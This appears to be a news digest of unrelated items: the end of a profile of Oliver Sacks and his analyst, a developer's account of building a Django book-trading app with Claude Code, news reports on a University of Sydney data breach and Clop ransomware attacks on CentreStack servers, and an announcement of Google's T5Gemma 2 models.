Mort Doran, a surgeon with Tourette’s syndrome whom Sacks profiled in “Anthropologist,” told me that he was happy with the way Sacks had rendered his life. He said that only one detail was inaccurate—Sacks had written that the brick wall of Doran’s kitchen was marked from Doran hitting it during Tourette’s episodes. “I thought, Why would he embellish that? And then I thought, Maybe that’s just what writers do.” Doran never mentioned the error to Sacks. He was grateful that Sacks “had the gravitas to put it out there to the rest of the world and say, ‘These people aren’t all nuts or deluded. They’re real people.’ ”

The wife in the title story of “Hat” had privately disagreed with Sacks about the portrayal of her husband, but for the most part Sacks appeared to have had remarkable relationships with his patients, corresponding with them for years. A patient called Ray, the subject of a 1981 piece about Tourette’s syndrome, told me that Sacks came to his son’s wedding years after his formal treatment had ended. Recalling Sacks’s death, he found himself suddenly crying. “Part of me left,” he said. “Part of my self was gone.”

A year after “Awakenings” was published, Sacks broke his leg in Norway, and Leonard L. and his mother wrote him a get-well letter. Thirty-two patients added their names, their signatures wavering. “Everybody had been counting the days for your return, so you can imagine the turmoil when they heard the news,” Leonard’s mother wrote. She explained that “most of the patients are not doing so well without your help and interest.” She added that Leonard “isn’t doing too well either.” When Leonard learned that Sacks wouldn’t be back, she said, “he shed enough tears to fill a bucket.”

Sacks spoke of “animating” his patients, as if lending them some of his narrative energy. After living in the forgotten wards of hospitals, in a kind of narrative void, perhaps his patients felt that some inaccuracies were part of the exchange. Or maybe they thought, That’s just what writers do. Sacks established empathy as a quality every good doctor should possess, enshrining the ideal through his stories. But his case studies, and the genre they helped inspire, were never clear about what they exposed: the ease with which empathy can slide into something too creative, or invasive, or possessive. Therapists—and writers—inevitably see their subjects through the lens of their own lives, in ways that can be both generative and misleading.

In his journal, reflecting on his work with Tourette’s patients, Sacks described his desire to help their illness “reach fruition,” so that they would become floridly symptomatic. “With my help and almost my collusion, they can extract the maximum possible from their sickness—maximum of knowledge, insight, courage,” he wrote. “Thus I will FIRST help them to get ill, to experience their illness with maximum intensity; and then, only then , will I help them get well!” On the next line, he wrote, “IS THIS MONSTROUS?” The practice came from a sense of awe, not opportunism, but he recognized that it made him complicit, as if their illness had become a collaboration. “An impulse both neurotic and intellectual (artistic) makes me get the most out of suffering ,” he wrote. His approach set the template for a branch of writing and thinking that made it seem as if the natural arc of illness involved insight and revelation, and even some poetry, too.

In his journals, Sacks repeatedly complained that his life story was over. He had the “feeling that I have stopped doing, that doing has stopped, that life itself has stopped, that it is petering out in a sort of twilight of half-being,” he wrote, in 1987. His journals convey a sense of tangible boredom. He transcribed long passages from philosophers and theologists (Simone Weil, Søren Kierkegaard, Gottfried Wilhelm Leibniz, Dietrich Bonhoeffer) and embarked on disquisitions on the best definition of reality, the “metabolism of grace,” the “deep mystery of incubation.” His thoughts cast outward in many directions—notes for a thousand lectures—then tunnelled inward to the point of non-meaning. “Where Life is Free, Immaterial, full of Art,” he wrote, “the laws of life, of Grace, are those of Fitness .”

Sacks proposed various theories for why he had undergone what he called “psychic death.” He wondered if he had become too popular, merely a fuzzy symbol of compassionate care. “Good old Sacks—the House Humanist,” he wrote, mocking himself. He also considered the idea that his four decades of analysis were to blame. Was it possible, he wrote, that a “vivisection of inner life, however conceived, however subtle and delicate, may in fact destroy the very thing it examines?” His treatment with Shengold seemed to align with a life of “homeostasis”—intimacy managed through more and more language, in a contained, sterile setting, on Monday and Wednesday mornings, from 6:00 to 6:45 A . M . They still referred to each other as “Dr. Sacks” and “Dr. Shengold.” Once, they ran into each other at a chamber concert. They were a few rows apart, but they didn’t interact. Occasionally, Shengold told his children that he “heard from the couch” about a good movie or play, but he never shared what happened in his sessions. They inferred that Sacks was their father’s patient after reading the dedication to him in “Hat.”

As Sacks aged, he felt as if he were gazing at people from the outside. But he also noticed a new kind of affection for humans—“homo sap.” “They’re quite complex (little) creatures (I say to myself),” he wrote in his journal. “They suffer, authentically, a good deal. Gifted, too. Brave, resourceful, challenging.”

Perhaps because love no longer appeared to be a realistic risk—he had now entered a “geriatric situation”—Sacks could finally confess that he craved it. “I keep being stabbed by love,” he wrote in his journal. “A look. A glance. An expression. A posture.” He guessed that he had at least five, possibly ten, more years to live. “I want to, I want to ••• I dare not say. At least not in writing.”

In 2008, Sacks had lunch with Bill Hayes, a forty-seven-year-old writer from San Francisco who was visiting New York. Hayes had never considered Sacks’s sexuality, but, as soon as they began talking, he thought, “Oh, my God, he’s gay,” he told me. They lingered at the table for much of the afternoon, connecting over their insomnia, among other subjects. After the meal, Sacks wrote Hayes a letter (which he never sent) explaining that relationships had been “a ‘forbidden’ area for me—although I am entirely sympathetic to ~~(indeed wistful and perhaps envious about)~~ other people’s relationships.”

A year later, Hayes, whose partner of seventeen years had died of a heart attack, moved to New York. He and Sacks began spending time together. At Sacks’s recommendation, Hayes started keeping a journal, too. He often wrote down his exchanges with Sacks, some of which he later published in a memoir, “Insomniac City.”

“It’s really a question of mutuality, isn’t it?” Sacks asked him, two weeks after they had declared their feelings for each other.

“Love?” Hayes responded. “Are you talking about love?”

“Yes,” Sacks replied.

Sacks began taking Hayes to dinner parties, although he introduced him as “my friend Billy.” He did not allow physical affection in public. “Sometimes this issue of not being out became very difficult,” Hayes told me. “We’d have arguments, and I’d say things like ‘Do you and Shengold ever talk about why you can’t come out? Or is all you ever talk about your dreams?’ ” Sacks wrote down stray phrases from his dreams on a whiteboard in his kitchen so that he could report on them at his sessions, but he didn’t share what happened in therapy.

Kate Edgar, who worked for Sacks for three decades, had two brothers who were gay, and for years she had advocated for gay civil rights, organizing Pride marches for her son’s school. She intentionally found an office for Sacks in the West Village so that he would be surrounded by gay men living openly and could see how normal it had become. She tended to hire gay assistants for him, for the same reason. “So I was sort of plotting on that level for some years,” she told me.

In 2013, after being in a relationship with Hayes for four years—they lived in separate apartments in the same building—Sacks began writing a memoir, “On the Move,” in which he divulged his sexuality for the first time. He recounts his mother’s curses upon learning that he was gay, and his decades of celibacy—a fact he mentions casually, without explanation. Edgar wondered why, after so many years of analysis, coming out took him so long, but, she said, “Oliver did not regard his relationship with Shengold as a failure of therapy.” She said that she’d guessed Shengold had thought, “This is something Oliver has to do in his own way, on his own time.” Shengold’s daughter, Nina, said that, “for my dad to have a patient he loved and respected finally find comfort in identifying who he’d been all his life—that’s growth for both of them.”

A few weeks after finishing the manuscript, Sacks, who’d had melanoma of the eye in 2005, learned that the cancer had come back, spreading to his liver, and that he had only months to live. He had tended toward hypochondria all his life, and Edgar thought that the diagnosis might induce a state of chronic panic. Since he was a child, Sacks had had a horror of losing things, even irrelevant objects. He would be overcome by the “feeling that there was a hole in the world ,” he wrote in his journal, and the fear that “I might somehow fall through that hole-in-the-world, and be absolutely, inconceivably lost.” Edgar had dealt for decades with his distress over lost objects, but she noticed that now, when he misplaced things, he didn’t get upset. He had an uncharacteristic ease of being.

In the summer of 2015, before Shengold went on his annual summer break, Sacks said to Edgar, “If I’m alive in September when Shengold returns, I’m not sure I need to go back to my sessions.” They had been seeing each other for forty-nine years. Sacks was eighty-two; Shengold was eighty-nine.

When Sacks was struggling with his third book, “ A Leg to Stand On ,” which was about breaking his leg and his frustration that his doctors wouldn’t listen to him, he wrote in his journal that Shengold had suggested (while apologizing for the corniness of the phrase) that the book should be “a message of love”—a form of protest against the indifference that so many patients find in their doctors. Shengold may have been giving Sacks permission to see their own relationship—the one place in which Sacks felt an enduring sense of recognition and care—as a hidden subject of the book. Extending Shengold’s idea, Sacks wrote, of his book, “The ‘moral’ center has to do with . . . the irreducible ultimate in doctor-patient relations.”

In August, two weeks before Sacks died, he and Shengold spoke on the phone. Shengold was with his family at a cottage in the Finger Lakes region of central New York, where he spent every summer. Nina told me, “We all gathered in the living room of that little cottage and put my father on speakerphone. Oliver Sacks was clearly on his deathbed—he was not able to articulate very well. Sometimes his diction was just gone. Dad kept shaking his head. He said, ‘I can’t understand you. I’m so sorry, I can’t understand you.’ ” At the end of the call, Shengold told Sacks, “It’s been the honor of my life to work with you,” and said, “Goodbye, Oliver.” Sacks responded, “Goodbye, Leonard.” It was the first time they had ever used each other’s first names. When they hung up, Shengold was crying.

After Sacks died, Shengold started closing down his practice. “It was the beginning of the end for him,” his son David told me. “He had lost most of his colleagues. He was really the last of his generation.” Nina said, “I do think part of why my father lived so long and was able to work so long was because of that relationship. That feeling of affection and kindred spirit was lifesaving.”

In “Awakenings,” when describing how Leonard L.—his “ ‘ideal’ patient”—initially responded to L-dopa, Sacks characterizes him as “a man released from entombment” whose “predominant feelings at this time were feelings of freedom, openness, and exchange with the world.” He quotes Leonard saying, “I have been hungry and yearning all my life . . . and now I am full.” He also says, “I feel saved. . . . I feel like a man in love. I have broken through the barriers which cut me off from love.’ ”

For years, Sacks had tested the possibility of awakenings in others, as if rehearsing, or outsourcing, the cure he had longed to achieve with Shengold. But at the end of his life, like an inside-out case study, he inhabited the story he’d imagined for his patients. “All of us entertain the idea of another sort of medicine . . . which will restore us to our lost health and wholeness,” he wrote, in “Awakenings.” “We spend our lives searching for what we have lost; and one day, perhaps, we will suddenly find it.” ♦

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Original Article

Previously on Facundo’s Adventures with LLMs :

On AI assistance (2024-03): I start to occasionally reach out to ChatGPT while working on a new open-source project, especially for chores like “I wish there already was a lib for this”, “I need a Makefile recipe for this”, etc. I see the potential; the results are hit-and-miss. I make plans to better integrate this tech into my workflow.
Augmentation / Replacement (2025-03): I added gptel to my Emacs setup and see myself using LLMs daily, as a rubber duck and as Google’s L1 Cache. I recognize the human augmentation potential of AI—not so much for what LLMs are today, but for the glimpse we get of what a better AI could be. On the other hand, the current push to use LLMs as human replacements seems short-sighted and counter-productive.
Quick notes on a brief agentic coding experience (2025-06): I naively try to use Claude Code to implement some features of an already working web application, burn some cash in the process, and get nothing much out of it.

This time I will document a successful experience I had building a small web app almost exclusively with Claude Code. My previous attempt at coding with agents had made me sick, but this time I felt empowered. What changed?

Part I: the project

The project is a book trading webapp for the Buenos Aires local area.

Users publish books they have for trading and browse through other users’ offered books.
When a user sees a book they like, they send an exchange request to the owner, who receives it as an email notification.
If the owner is interested in any of the requester’s books, they arrange to meet and make the trade. This exchange takes place outside of the application (there is no incentive to keep them in-app, email and WhatsApp work better).

I wrote this application from scratch ¹ using Django, SQLite for the database, and Bulma for styles. It runs on a small Debian server behind nginx. The code is here .

Goals

Finishing the project , with the specific UX I had in mind (which was very simple).
Minimizing the effort I had to make to implement it (counting the frustration and disgust with the tooling, e.g. Claude Code, as part of that effort).
Minimizing operational costs to run the system: if this was successful I would run it as a free community project, so I needed to design it to run cheap and not take much of my time.
Keeping a decent understanding of the codebase (at least the backend portion of it).

Non-goals

There are a number of things I typically go for in personal projects, which I didn’t care about for this one:

Maximizing speed: as long as I got it finished with low effort, I was in no rush.
Having fun.
Learning.
Ensuring long-term maintainability, flexibility, or extensibility of the codebase: in a way, this was a proof of concept. I wanted to get it out and see if people liked it. It’s small enough that I can make some compromises, because it wouldn’t be hard to quickly rewrite if necessary.
Building a successful product: I wanted this to succeed, not least because I wanted to use it to trade books but, other than making the application free and accessible, it was out of my hands whether people adopted it or not—I wouldn’t go out of my way to promote it, either.
Making users happy: since this wasn’t a business, I could afford to miss features, ship bugs, lose data, etc.

While all the things on this second list are desirable, I was willing to trade them off for those on the first one.

Using agents

Given the specific mix of goals and non-goals, this seemed like a good opportunity to have another try at building with agents, instead of writing all the code myself ² . I could afford some of the risks I associate with delegating too much to AI—shipping something I don’t fully understand, that could take me an extra effort to fix when it breaks, or that turns out to be unmaintainable in the long run.

A few things had changed since my previous experiment with Claude Code:

I learned about the 20USD/month Pro plan, which was more reasonable for personal projects than the Max plans or the API key alternative.
I kept reading accounts from other (often skeptical) developers, which gave me new ideas and better context to work with these tools.
This was a greenfield project, where agents shine. The stack was more LLM-friendly, too: the Django guardrails plus vanilla JavaScript are a better match to their training set than my previous Flask/SQLAlchemy/HTMX/hyperscript extravaganza.

Django was an ideal fit for me to leverage LLMs: I used Django intensively for 5 years… a decade ago. I still have a good grasp of its concepts, a notion of what’s doable with it, what’s built-in and what should be ad hoc, etc., but I completely forgot the ORM syntax, the class names, the little details. I could instruct Claude exactly what to do, saving me a lot of documentation roundtrips while still catching it whenever it tried to bullshit me into getting creative or reinventing the wheel.

For the front-end, the risk/reward was a bit higher. I’ve been officially a backend dev for a while now, and while I’ve used Bulma on a few projects and have a good idea of what it offers, I’m not trained to review HTML and CSS, so it was likelier that Claude would slip working, superficially good-looking front end code that would quickly degrade and become an unmaintainable mess. On the other hand, and for the same reasons, despite my best intentions the HTML and CSS I produce manually tends to be less maintainable anyway—Claude would just accelerate this cycle. In the end, this turned out to be a good trade-off, since Claude allowed me to iterate quickly in prototype mode and arrive at a look-and-feel that fit the project, something that would have taken me much effort if I was writing the HTML myself.

Results

I released an MVP after one week of part-time work, and a few extra nice-to-haves a week later. At the time of writing, there are 80 registered users and 400 offered books. The app doesn’t track this, but I know first hand of a few book exchanges that already took place.

In terms of operational costs, which I tried to keep low:

6 USD/month on a Hetzner VPS
7 USD/year on a Porkbun domain
2.5 USD/every 6 months for ZeptoMail credits

This 7 USD/month total is less than what a second hand book costs in my city.

Part II: the process

I really liked the recent A Month of Chat-Oriented Programming post and I borrowed a few ideas from it. I like the notion of chat-oriented programming as opposed to vibe-coding. That’s what I tried to do with this project, although my own variation of it, which I describe next.

1. Skip agent setup

I made a very deliberate choice not to invest in agent customization, support tooling, or whatever that’s called: no fancy CLAUDE.md instructions, no MCP servers, no custom commands, no system prompts, no skills, no plugins. I’m not saying these aren’t useful, but I find them to be distracting rabbit holes: in my previous experiments I ended up spending a lot of tokens trying to come up with a robust workflow specification, only to have Claude randomly ignore or miss it.

A fundamental flaw with this form of programming is that the agent doesn’t seem to know much about itself, its configuration, or its commands. When deep in conversational mode, one feels inclined to approach tweaking the tool in the same way, asking it to explain itself or telling it to adjust its settings, only to find that’s beyond its capabilities. In that context, tweaking the agent at will requires an onerous context switch for the user; in my opinion, spending mental cycles in such meta-tasks defeats the purpose of AI coding. To compound the problem, since these tools seem to change every other month, it’s hard to see fine-tuning as a good investment. My attitude then was: see how far this can get me today with minimal setup; if that’s not very far, I’ll just wait and try again in a few months.

2. Switch tactically between default, edit, and plan mode

For non trivial features I started the session with some product-level context of the requirement and the subset of files relevant to the implementation. Then I bounced some ideas with Claude, sometimes providing a succinct TODO list of things that I expected to see change in the app or the code. My goal was to minimize the opportunities for it to improvise or get creative, while still giving it room to catch weak spots in my reasoning.

Example prompt transcript

we are going to work on setting up email handling in this django app. in preparation read first claude.md, then the models, the views and the test module.

first I want to add the necessary file setup to have different configuration overrides per environment

I will want to leverage django provided tools such that when testing, I’ll use the memory email backend so we can check the outgoing emails in the tests (assuming that requires such backend) and I want the console email backend in development (the default) such that I can see eg the email verification code in the console while making tests

the production env will use a proper setup, but I won’t work on configuring the service quite yet. my goal is that the code run in the backend is the same regardless of the env, and that I can start leveraging in unit tests and new features, so that I can worry later about setting up the service without much rework.

start with a proposal for the per env settings

For the few more involved features I worked exclusively in plan mode, having Claude Code produce a markdown file as output to be picked up on a separate session.

Example prompt transcript

this is a book exchange django application, which is intended to be minimalistic, extremely simple to use and cheap to run and operate on a small VPS server

I already have the basics in place, and I’m exploring the feasibility of adding something that I consider a complex feature. But I want to analyze options in case I end up wanting to implement it. The feature is for the users to optionally upload a cover photo of their book (of their actual physical book, that reflects not only edition but condition of the book).

The way I imagine this would be that they would continue to use current offered books form, which is designed for lean bulk addition of books, but after adding them they could upload or take a photo (if on the phone) via a link or button in their list of offered books in their profile.

the cover images would then be displayed as thumbnails in the scrollable list of books in the home page. this would make the app more attractive to users and incentivize more exchanges (it’s more tempting to request an exchange if you’ve seen the book than just reading a title you may not even not know about).

I know that django has an ImageField for uploading data. I would want to store only small-ish thumbnails not the full photo, so I expect some post processing, I suppose using pillow. the server has a few available gigas of storage so I could make it so that media is stored in the server and just the most recent N image (e.g. 1k) are ever kept to prevent running out of space. (e.g. via a cronjob that runs a management command; I don’t want to add celery or something like that for background jobs—this should be operationally simple above all).

the main concern I have right now is how would that look in the front end side of things. I use bulma and do server side rendering of templates, with inline vanilla js for some dynamicity. Is there a library or browser feature that would be a good fit for this? I imagine something where the user clicks the photo button and would allow either to upload a photo from disk or leverage the phone camera to take a picture.

3. Claude writes the code, you commit

I reviewed all code before each commit, asking for fixes and refactors, and again before merging the PR. This process pushed me to break the tasks down into obvious increments that would make good commits, which I listed in my instructions (this isn’t very different from the process I follow when I’m the one writing the code). When Claude was working, I kept an eye on the console output and interrupted it when it looked like it was trying to do too much at once.

Example commit log

commit 615ee01ff933ea48cc145bec4ccc946177d1a244
Author: Facundo Olano 
Date:   Mon Dec 1 08:37:39 2025 -0300

    send exchange request (#10)

    * extract exchange button to template fragment

    * stub exchange view

    * first stab at button processing js

    * refactor to reduce knowledge dup

    * remove weird csrf setup

    * improve modal style

    * stub backend implementation

    * email+request transaction

    * remove delay

    * fix error handling

    * polish messages

    * change subject

    * flesh out email message

    * stub more tests

    * first stab at solving the test

    * improve response management

    * refactor helper

    * add test

    * add test

    * add test

    * add test

    * more tests

    * fix settings management

    * fix response html

4. Define precisely what and how to test

I find that an explicit test exercising every relevant “business rule” is more effective than documentation, code comments, and the overall design/architecture in capturing the desired system behavior and guaranteeing that it does what it is supposed to do. This is even more important in the context of agentic coding, where I’m voluntarily resigning some control over the implementation.

I mostly agree with the sacred rule in Field Notes From Shipping Real Code With Claude : Never. Let. AI. Write. Your. Tests. I was slightly less strict, though: instead of writing test code myself, I provided a set of rules and step-by-step outlines of the integration tests I wanted:

def request_book_exchange(self):
    # register two users
    # first user with 3 books
    # second user two books
    # send request for second book
    # check outgoing email
    # check email content includes 2nd user contact details
    # check email content lists user books
    pass

def mark_as_already_requested(self):
    # register two users
    # first user with 3 books
    # second user gets home, sees all three books and Change button
    # send request for second book
    # request list shows 2 Change, one already request
    pass

Then I carefully reviewed the implementation to ensure it followed my testing preferences: don’t couple to implementation details (test units of behavior, not units of code), don’t mock intermediate layers (just the inputs and outputs of your system, i.e. its observable behavior), don’t access the DB directly ³ . Once a few tests were in place, Claude was less likely to deviate from the surrounding style.

I also did some smoke testing after each feature was ready to merge. I haven’t experimented with something like Playwright, but I suspect that would be a good addition to prevent regressions in the UI, which is where most of the application complexity resides.

5. Don’t let Claude drive while debugging

For an unsophisticated project like this, with good enough detail in the prompts, Claude tends to get the implementation right or almost right, let’s say, 80% of the time.

I noticed that, when something fails and the problem isn’t obvious, Claude can quickly figure out the problem on its own, maybe 30% of the time. This includes some subtle or cryptic errors that could take me hours to resolve myself. The problem is that remaining 70%. I find that the LLM, even with the command line and internet access at its disposal, if left unchecked will be both clueless and eager to try things at random, accumulating layers of failed fixes, going in circles and very far from discovering the problem.

What worked for me is to give it one shot to figure out the issue autonomously and, when that fails, take over, not necessarily to do the whole debugging and fix myself but to feed it plausible hypotheses and evidence, to put it back on track to a solution.

6. Don’t repeat yourself (but sometimes do)

Code duplication is an interesting thing to reflect about when working with agents. LLMs get paid (?) to output tokens, so unsurprisingly Claude Code indulges in all kinds of duplication, from repeating snippets found in the module it’s editing to reimplementing entire chunks of the very Django built-ins it subclasses. It would be tempting to add strict rules to CLAUDE.md, rejecting all kinds of code duplication, but as we collectively learned in the last decade, dogmatically applying the DRY principle tends to do more harm than good.

The anniversary edition of The Pragmatic Programmer makes a useful distinction between duplication of code and duplication of knowledge , the latter being what we need to be more wary of. In the context of coding with LLMs—where reproducing text is free and inline code saves tokens, but scattered knowledge threatens system survival—, this distinction is fundamental. I found a major part of my refactoring was to decide if I should allow or remove duplication: if it’s knowledge, it should be centralized and I need to carefully think how; if it’s just code, I can consider extracting it for reuse but, more often than not, it’s better just live with that duplication.

7. Plan around token and session limits

There are some usage limits to take into account when working with Claude Code.

The first is the size of the conversation context window. There is only so much information the model can fit into its context when processing a message, and a long-running session will eventually exhaust it. By default, CC will try to “compact” the context to keep it manageable but, as noted in the Month of CHOP post, this degrades the quality of its output. I also found that the process of compaction itself spends a lot of tokens, which is problematic because of the Plan usage limits.

I followed the Month of CHOP post advice to turn off autocompaction in the settings, and kept an eye on token consumption via the /context command, which looks like this:

> /context
  ⎿
  ⎿   Context Usage
  ⎿  ⛁ ⛀ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛀   claude-sonnet-4-5-20250929 · 80k/200k tokens (40%)
  ⎿  ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁
  ⎿  ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁   ⛁ System prompt: 3.1k tokens (1.6%)
  ⎿  ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁ ⛁   ⛁ System tools: 15.3k tokens (7.7%)
  ⎿  ⛁ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶   ⛁ Memory files: 1.8k tokens (0.9%)
  ⎿  ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶   ⛁ Messages: 60.0k tokens (30.0%)
  ⎿  ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶   ⛶ Free space: 120k (59.8%)
  ⎿  ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶
  ⎿  ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶
  ⎿  ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶ ⛶
  ⎿
  ⎿  Memory files · /memory
  ⎿  └ Project (/Users/facundo/dev/facundoolano/giralibros/CLAUDE.md): 1.8k tokens
  ⎿
  ⎿  SlashCommand Tool · 1 commands
  ⎿  └ Total: 981 tokens
  ⎿
  ⎿

In addition to the conversation context, Claude Pro has limits on how much you can consume per week and per session, which can be monitored at https://claude.ai/settings/usage :

I’ve observed that I exhaust the session limit after a couple of hours of steady work (having to wait 2-3 hours to resume), and a weekly plan limit if I work ~4-5 days in a row, so I learned to plan my work around these constraints:

Much like I split code changes into commit-sized steps, I split features into PR-sized sessions.
I tried to work on a single thing at a time, e.g. resisting the temptation to add extra/unrelated tasks as they popped to mind. Which was a good idea, anyway, both for project organization and to keep the agent focused on the task at hand.
I monitored the context window, restarting Claude to “checkpoint” when I was done with a feature and wanted to start on another.
For bigger tasks that I anticipated wouldn’t fit in the context window or session limit, I would do one or more planning sessions first, followed by an implementation session.

While I was very annoyed to discover these limits, I think they pushed me to stay methodical. If I ran out of tokens and I still wanted to make progress, I would switch to non-AI driven activities (plan, research, stub tests, server config, etc.). I find this was a healthy balance for me, as I avoided getting dragged into the slot machine.

If this was my job and not a side project, and I needed to increase my throughput, rather than switching to a 100 USD Max plan, I would combine this Pro plan with a Codex Plus from OpenAI (also 20USD/month, getting exposure to another model).

Conclusions

The process just described may sound like heavy work and a lot of hand-holding, and it’s probably not what the “pros” are doing out there with agents but, as stated before, the goal here was not to maximize velocity or throughput but to get a finished product with minimal effort and frustration. I have a fair amount of experience in high-level task breakdown, writing tickets for others to work on, doing superficial code reviews, anticipating pitfalls, and building confidence in a shared codebase through a solid test suite. This played to my strengths and mostly prevented the LLM from digging itself into a hole that I’d have to get it out of. The micromanaging approach turned out to be very effective and low effort, at times even rewarding—to see features that sounded complicated at first, and that I would have postponed, work out in a few strokes, was stimulating. It highlighted how much more skill is at play in software building, beyond writing code. I occasionally fell into the illusion that I wielded this powerful tool, one that extended my reach and abstracted unimportant details away.

A few months ago I qualified the feeling I got from building with agents as “exhilarating recklessness” and compared it with going to the casino. This time it felt as if, after accumulating 15 years of experience, I was “spending” some of it to get something I wanted. The analogy goes farther: I acknowledge that if I only worked like this, some of my skills would atrophy—I would run out of savings.

I’m sure I made some mistakes by letting Claude do the coding for me, but this was clearly a successful project given my initial goals and the results I got. I still think it wouldn’t be wise to use agents much at work, beyond proof-of-concept software—trading short-term productivity for long-term ownership is rarely a good bargain. As for low-stakes projects, I like that the barrier has lowered to ship good-enough software. It’s great to cheaply try out different ideas, without prospects of turning them into reliable systems or marketable products.

Notes

University of Sydney suffers data breach exposing student and staff info

Bleeping Computer

www.bleepingcomputer.com

2025-12-18 20:22:58

Hackers gained access to an online coding repository belonging to the University of Sydney and stole files with personal information of staff and students. [...]...

Original Article

University of Sydney suffers data breach exposing student and staff info

Hackers gained access to an online coding repository belonging to the University of Sydney and stole files with personal information of staff and students.

The institution said the breach was limited to a single system and was detected last week. It promptly shut down the unauthorized access and notified the New South Wales Privacy Commissioner, the Australian Cyber Security Centre, and education regulators.

"Last week, we were alerted to suspicious activity in one of our online IT code libraries. We took immediate action to protect our systems and community by blocking the unauthorised access and securing the environment," reads the announcement .

"While principally used for code storage and development, unfortunately, there were also historical data files in this code library containing personal information about some members of our community."

The personal data stolen in the attack impacts more than 27,000 individuals as follows:

10,000 current staff and affiliates employed or affiliated as of 4 September 2018
12,500 former staff and affiliates from the same date
5,000 students and alumni (from datasets dated roughly 2010–2019), plus six supporters

The staff data includes names, dates of birth, phone numbers, home addresses, and job details.

Although the university confirmed that this data was accessed and downloaded, it underlined that it found no evidence that it had been published online or misused.

The University of Sydney is a public university, one of the largest and most important in Australia, with 70,000 students and 10,000 academic and administrative staff.

The educational institute has started informing impacted individuals via personalized notifications today and expects to complete this process by next month.

A dedicated cyber-incident support service has also been established to provide counseling and support for affected individuals. A FAQ page has also been published and will be updated with new information from the investigation in progress.

Affected staff and students are advised to remain vigilant for unsolicited communications requesting additional information, change their online account passwords, and enable multi-factor authentication (MFA) where possible.

BleepingComputer has contacted the University of Sydney to request more details about the attack, but we are still waiting for a response.

In September 2023, the organization suffered another data breach from a third-party service provider, which exposed the personal information of international applicants at the time.

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

Clop ransomware targets Gladinet CentreStack in data theft attacks

Bleeping Computer

www.bleepingcomputer.com

2025-12-18 20:16:55

The Clop ransomware gang is targeting Internet-exposed Gladinet CentreStack file servers in a new data theft extortion campaign. [...]...

Original Article

Hacker

The Clop ransomware gang (also known as Cl0p) is targeting Internet-exposed Gladinet CentreStack file servers in a new data theft extortion campaign.

Gladinet CentreStack enables businesses to securely share files hosted on on-premises file servers through web browsers, mobile apps, and mapped drives without requiring a VPN. According to Gladinet, CentreStack "is used by thousands of businesses from over 49 countries."

Since April, Gladinet has released security updates to address several other security flaws that were exploited in attacks , some of them as zero-days .

The Clop cybercrime gang is now scanning for and breaching CentreStack servers exposed online, with Curated Intel telling BleepingComputer that ransom notes are left on compromised servers.

However, there is currently no information on the vulnerability Clop is exploiting to hack into CentreStack servers. It is unclear whether this is a zero-day flaw or a previously addressed bug that the owners of the hacked systems have yet to patch.

"Incident Responders from the Curated Intelligence community have encountered a new CLOP extortion campaign targeting Internet-facing CentreStack file servers," warned threat intel group Curated Intelligence on Thursday.

"From recent port scan data, there appears to be at least 200+ unique IPs running the "CentreStack - Login" HTTP Title, making them potential targets of CLOP who is exploiting an unknown CVE (n-day or zero-day) in these systems."

Clop's data theft attacks

Clop has a long history of targeting secure file transfer products. In the past, the extortion gang has been behind other data theft campaigns targeting Accellion FTA , GoAnywhere MFT , Cleo , and MOVEit Transfer file-sharing servers, the latter of which affected over 2,770 organizations worldwide .

Most recently, it exploited an Oracle EBS zero-day flaw (CVE-2025-61882) to steal sensitive files from many organizations since early August 2025 .

The list of Oracle customers impacted includes Harvard University , The Washington Post , GlobalLogic , the University of Pennsylvania , Logitech , and the American Airlines subsidiary Envoy Air .

After breaching their systems and exfiltrating sensitive documents, Clop published the stolen data on its dark web leak site and made it available for download via Torrent.

The U.S. Department of State is offering a $10 million reward for any information that could link this cybercrime gang's attacks to a foreign government.

A Gladinet spokesperson was not immediately available for comment when contacted by BleepingComputer earlier today

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

T5Gemma 2: The next generation of encoder-decoder models

Hacker News

blog.google

2025-12-18 19:48:15

Comments...

Original Article

T5Gemma 2 is more than a re-training. It incorporates significant architectural changes while inheriting many of the powerful, next-generation features of the Gemma 3 family.

T5Gemma 2 is the next evolution of our encoder-decoder family based on Gemma 3, featuring the first multi-modal and long-context encoder-decoder models.

Unlike T5Gemma, T5Gemma 2 adopts tied word embeddings (over encoder and decoder) and merged decoder self- and cross-attention to save model parameters. It offers compact pre-trained models at sizes of 270M-270M (~370M total, excluding vision encoder), 1B-1B (~1.7B) and 4B-4B (~7B) parameters, making them ideal for rapid experimentation and deployment in on-device applications.

Background

With the original T5Gemma , we demonstrated that we could successfully adapt modern, pre-trained decoder-only models into an encoder-decoder architecture, unlocking new versatility. By initializing with weights from a powerful decoder-only model and then applying continued pre-training, we created high-quality, inference-efficient models while bypassing the computational cost of training from scratch.

T5Gemma 2 extends this into the realm of vision-language models by incorporating key innovations from Gemma 3.

What’s new

T5Gemma 2 is more than a re-training. It incorporates significant architectural changes while inheriting many of the powerful, next-generation features of the Gemma 3 family.

Architectural innovations for efficiency

To maximize efficiency at smaller scales, we have introduced key structural refinements:

Tied embeddings: We now tie the embeddings between the encoder and decoder. This significantly reduces the overall parameter count, allowing us to pack more active capabilities into the same memory footprint — crucial for our new compact 270M-270M model.
Merged attention: In the decoder, we adopt a merged attention mechanism, combining self- and cross-attention into a single, unified attention layer. This reduces model parameters and architectural complexity, improving model parallelization and benefiting inference.

Next-generation capabilities

Drawing from Gemma 3, T5Gemma 2 also represents a significant upgrade in model capabilities:

